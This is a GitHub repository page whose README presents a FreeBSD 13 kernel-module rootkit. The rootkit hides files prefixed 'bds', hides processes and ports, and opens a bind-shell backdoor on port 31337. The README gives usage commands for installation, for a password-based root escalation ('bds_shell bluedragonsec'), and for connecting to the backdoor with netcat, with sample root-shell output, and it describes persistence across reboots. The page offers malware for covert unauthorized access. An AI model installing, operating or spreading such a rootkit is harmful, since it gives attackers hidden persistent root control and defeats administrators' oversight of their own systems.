Skip to content

Freebsd KLD Rootkit for FreeBSD 13. Hides files, hides process, hides port, bind shell backdoor

Notifications You must be signed in to change notification settings

bluedragonsecurity/bds_freebsd

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

9 Commits
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

BDS KLD ROOTKIT

Freebsd KLD Rootkit for FreeBSD 13. Hide files, hide process, hide port, bind shell backdoor
Developed by : Antonius
Website : www.bluedragonsec.com
Github : https://github.com/bluedragonsecurity
Twitter : https://twitter.com/bluedragonsec

Features

  • Bind shell on port 31337
  • Bind shell process hiding
  • Hides file with prefix bds
  • Hides bind shell port
  • Privilege escalation with password

Installation


You need root privilege, make and gcc to install this rootkit. To install just type :
./install.sh

Using the Rootkit

Privilege Escalation
Once the rootkit installed on the system, in case you lost root privilege, you can regain root privilege by typing :

  /sbin/bds_shell bluedragonsec
  
Typing above command will make you regain root privilege :
robotsoft@robotsoft ~> id
uid=1002(robotsoft) gid=1002(robotsoft) groups=1002(robotsoft),0(wheel),5(operator)
robotsoft@robotsoft ~> /sbin/bds_shell bluedragonsec
root@robotsoft:~ # id
uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)
root@robotsoft:~ # 

Connecting to Bind Shell Backdoor
Connecting to bind shell on a freebsd server which you have installed this rootkit can be accomplished simply by using netcat :

nc (server ip) 31337
For example, freebsd server with rootkit installed is at 192.168.0.141 :
root@robotsoft ~# nc 192.168.0.141 31337
FreeBSD robotsoft 13.2-STABLE FreeBSD 13.2-STABLE GENERIC amd64
sh: turning off NDELAY mode
id
uid=0(root) gid=0(wheel) groups=0(wheel)
pwd
/

Hiding Files and Directories
To hide file and directory just give prefix bds to file name and directory name

Process Hiding This rootkit hides bind shell process from ps.

Port Hiding
This rootkit hides bind shell port from netstat.

Persistence
The rootkit is activated every time the system starts up. After the reboot, wait for 1 minute, the rootkit will be loaded into kernel.

About

Freebsd KLD Rootkit for FreeBSD 13. Hides files, hides process, hides port, bind shell backdoor

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published